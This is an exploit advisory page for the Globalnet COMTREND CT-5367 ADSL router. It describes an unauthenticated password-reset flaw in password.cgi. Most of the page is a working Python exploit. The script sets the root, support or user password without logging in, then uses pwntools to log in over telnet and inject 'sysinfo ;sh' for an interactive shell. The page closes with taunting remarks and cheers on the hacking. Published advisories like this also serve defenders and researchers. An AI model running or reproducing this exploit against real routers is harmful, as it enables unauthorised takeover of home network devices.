COMTREND ADSL Router CT-5367 Remote Code Execution

2017.12.26
Credit: TnMch
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute # Date: 11-12-2017 # Exploit Author: TnMch # Software Link : null # Type : HardWare # Risk of use : High # Type to use : Remote 1. Description Any user can edit all users password and execute remote code directly without have access 2. Proof of Concept request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi <form> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="120">Username:</td> <td><select name='userName' size="1"> <option value="0"> <option value="1">root <!-- admin --> <option value="2">support <!-- support --> <option value="3">user <!-- user --> </select></td> </tr> <tr> <td>Old Password:</td> <td><input name='pwdOld' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>New Password:</td> <td><input name='pwdNew' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>Confirm Password:</td> <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td> </tr> </table> <br> <center><input type='button' onClick='btnApply()' value='Save/Apply'></center> </form> 3 .exploit #!/usr/bin/env python import platform import requests import base64 url = "http://192.168.1.1/" ''' first check default gateway ''' r = requests.get(url,allow_redirects=True) resp = r.content '''Check resp''' if 'Authorization' not in resp: exit("[-]Invalid host !! ") ''' Change password ''' again = True while again: print "Which User" print "(root | support | user )" user = raw_input('user : ').split()[0] if user not in ("root","support","user"): exit("[-] No user with this name !! ") print "[+] Update password ",user password = raw_input('new password : ').split()[0] print "[+] Update new password ['",password,"']" if user == "root": url +="password.cgi?sysPassword="+password if user == "support": url +="password.cgi?sptPassword="+password if user == "user": url +="password.cgi?usrPassword="+password pass_b64 = password.encode('base64').split()[0] r2 = requests.get(url,allow_redirects=True) resp2 = r2.content ''' Check update ''' if pass_b64 in resp2: print "[+] Password for user : ",user," updated!" print "Happy hacking :D, enjoy" else: print "[-] Something Wrong , please check again! " y_n = raw_input('Do you want again? :D (y/n) : ').split()[0] if 'n'!= y_n and 'y' != y_n: exit('bad input :(') if y_n == 'n': print "Go Go Go :D ,No Time for you Mr.Robot" shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0] if shell_yn !='n': sys = platform.system() if sys =="Windows": exit("Sorry only on Linux or Mac Os") from pwn import * target = "192.168.1.1" port = 23 p = remote(target,port) p.recvuntil("Login:") p.sendline(user) p.recvuntil("Password:") p.sendline(password) p.sendline("sysinfo ;sh") p.interactive() again = False


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top